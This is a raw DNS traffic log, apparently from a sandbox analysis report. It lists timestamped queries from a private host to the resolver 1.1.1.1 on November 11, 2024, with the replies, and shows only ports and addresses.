                                                                                                                                                                                                          Nov 11, 2024 18:24:53.428070068 CET5900153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.436923027 CET53645821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.437253952 CET53528811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.439939022 CET53569911.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.442996025 CET53590011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.451994896 CET5403953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.483153105 CET53540391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.484781981 CET5534953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.485193968 CET5158753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.485383987 CET5415153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.495418072 CET53553491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.497920990 CET5136053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.498975992 CET5472953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.506207943 CET53515871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.508172989 CET53513601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.509258032 CET53547291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.517322063 CET53541511.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536467075 CET5847753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536693096 CET5953453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536851883 CET6131353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.536999941 CET5319753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537161112 CET4942353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537328005 CET6514753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537472963 CET5156953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537607908 CET5959753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537755013 CET5681653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.537899971 CET6042353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538039923 CET6478053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538193941 CET5061553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538330078 CET5073953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538486958 CET5191053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538641930 CET5901053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.538992882 CET6242453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.540559053 CET5527053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.540736914 CET5213753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.540904045 CET6263153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541053057 CET5023053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541201115 CET6519453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541354895 CET5726853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541517019 CET6362953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541660070 CET6018553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541820049 CET6015453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.541960001 CET5495453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542171001 CET6162253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542617083 CET6143253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542778015 CET6358853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.542956114 CET5536053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.545353889 CET53568161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.546092033 CET53613131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.547703028 CET53595971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.547764063 CET53521371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.547781944 CET53651471.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.547794104 CET53519101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.547897100 CET53494231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.548283100 CET53531971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.548311949 CET53647801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.549468994 CET53604231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.549746037 CET53584771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.550406933 CET53552701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.550776958 CET53572681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.551282883 CET53651941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.551367998 CET53502301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.552267075 CET53636291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.552791119 CET53553601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.554208040 CET5700553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.554718018 CET6508053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.554836988 CET53635881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.557899952 CET5834753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558074951 CET5034153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558227062 CET5006853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558374882 CET5197053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558598995 CET53601541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.558856964 CET6186853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.566905022 CET53595341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.568021059 CET53519701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.568732977 CET53507391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.569339991 CET53515691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.569499969 CET53506151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.569880962 CET53590101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.571259975 CET53624241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.571378946 CET53626311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.572776079 CET53616221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.573112011 CET53650801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.573355913 CET53601851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.574728966 CET53614321.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.574817896 CET53549541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.576611042 CET53500681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.586091042 CET53570051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.590883970 CET53583471.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.590899944 CET53503411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.590914011 CET53618681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.618438005 CET5120053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.621239901 CET4957153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.621493101 CET5942653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.628288984 CET53512001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.630203009 CET5114153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.631357908 CET53495711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.631808043 CET5394353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.632425070 CET6077753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.632611990 CET5933553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.633476019 CET5698953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.641041994 CET53511411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.642096996 CET53539431.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.642165899 CET53593351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.642503023 CET53607771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.645560980 CET53569891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:53.652569056 CET53594261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.323288918 CET6521253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.333003998 CET53652121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.386430025 CET5150053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.387187958 CET5602553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.389484882 CET6150553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.390428066 CET6185653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.400829077 CET53560251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.400919914 CET5670553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.404783010 CET53618561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.409092903 CET53567051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.422476053 CET53515001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.424098969 CET53615051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.427473068 CET5011053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.448486090 CET5304153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.459588051 CET53501101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.461375952 CET53530411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.476851940 CET6000153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.486540079 CET53600011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.511444092 CET4925553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.521225929 CET53492551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.568222046 CET5314853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.600740910 CET53531481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.602427006 CET5301253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.610102892 CET53530121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.218621016 CET6177553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.219046116 CET6310853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.219340086 CET5018053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.228940010 CET53631081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.236501932 CET53501801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.287945032 CET5825453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.298300982 CET53582541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.299238920 CET5137553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.306947947 CET53513751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.346816063 CET53617751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.398035049 CET5577553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.411056995 CET6010753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.419946909 CET53557751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.589545965 CET5249753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.590857983 CET6284853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.599231958 CET53628481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.603226900 CET53601071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.691452980 CET53524971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.602719069 CET5164553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.604110956 CET5203453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.606852055 CET6336153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.610268116 CET53516451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.614001036 CET5776253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.614353895 CET53520341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.614392996 CET53633611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.631711006 CET4916053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.633816004 CET6051853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.633992910 CET5184453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.634186983 CET5340453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.634352922 CET5085353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.637466908 CET5187853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.641442060 CET53605181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.643809080 CET53508531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.645325899 CET53577621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.648015976 CET53518781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.663960934 CET53491601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.665631056 CET53518441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.665772915 CET53534041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.464513063 CET5819153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.496793032 CET53581911.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.553632975 CET5891953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.561250925 CET53589191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.606688023 CET6042153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.616686106 CET53604211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.707876921 CET5683753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.714859009 CET53568371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:01.073718071 CET6137453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:01.085196018 CET53613741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:02.952713013 CET5335353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:02.963246107 CET53533531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.124716043 CET6282153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.157669067 CET53628211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.329961061 CET5783053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.339674950 CET53578301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.691922903 CET5328253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.699822903 CET4991153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.703833103 CET53532821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.718950987 CET53499111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.727994919 CET5480653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.734913111 CET5399953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.738079071 CET53548061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.743426085 CET6128153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.753700018 CET53612811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.765573025 CET53539991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.989797115 CET5519453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.000041008 CET53551941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.027837992 CET6491653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.059840918 CET53649161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.165056944 CET6102753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.187638998 CET5922653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.190156937 CET5709953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.197166920 CET53592261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.198887110 CET53610271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.220971107 CET53570991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.319248915 CET5964553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.350805998 CET53596451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.505903959 CET6060853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.516415119 CET6175453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.528301001 CET53617541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.537915945 CET53606081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.541640997 CET5628753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.552474976 CET53562871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.688436985 CET5300753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.719742060 CET53530071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.298027039 CET5355253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.307763100 CET53535521.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.316813946 CET6391953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.325150013 CET53639191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.330466032 CET5026553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.334292889 CET5328553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.335695982 CET5605953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.337727070 CET4984953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.337889910 CET5712853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.340759993 CET6318853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.344613075 CET53532851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.345194101 CET53560591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.347683907 CET53498491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.347763062 CET53571281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.360133886 CET6503853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.360341072 CET6510653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.360949039 CET5826253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.361351967 CET5053353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.361680984 CET6109053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.361866951 CET53502651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.365153074 CET5908253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.365633965 CET6036653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.366309881 CET6280753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.369070053 CET5984553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.369257927 CET5386753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.369457006 CET6525753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.369621992 CET53650381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.369699001 CET5366753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.370189905 CET53582621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.370254040 CET5947553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.370709896 CET53505331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.371236086 CET5134753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.371607065 CET6424753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.371809006 CET6151753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.372076988 CET53631881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.372833014 CET4957753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.373136997 CET4972153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.375039101 CET5047753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.375123978 CET6456653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.375849962 CET53603661.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.376135111 CET4931253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.376317978 CET6242953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.376563072 CET53628071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.376786947 CET5489753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.377471924 CET5728553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.377648115 CET5868653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.377804995 CET5990353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.378710985 CET53513471.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.380645990 CET5434553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.380800962 CET53536671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.381211042 CET53497211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.381339073 CET53642471.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.381350040 CET53615171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.381664991 CET53594751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.382680893 CET6387353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.385649920 CET53504771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.387067080 CET53572851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.387837887 CET6151853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.387892962 CET53548971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.388907909 CET6245553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.388907909 CET5437953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.389197111 CET5200353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.390213013 CET53543451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.391789913 CET53651061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.391801119 CET53495771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.392281055 CET53610901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.394761086 CET53638731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.396511078 CET53624551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.397347927 CET53590821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.398473024 CET53615181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.399868965 CET53598451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.400618076 CET53520031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.400716066 CET53652571.1.1.1192.168.2.8
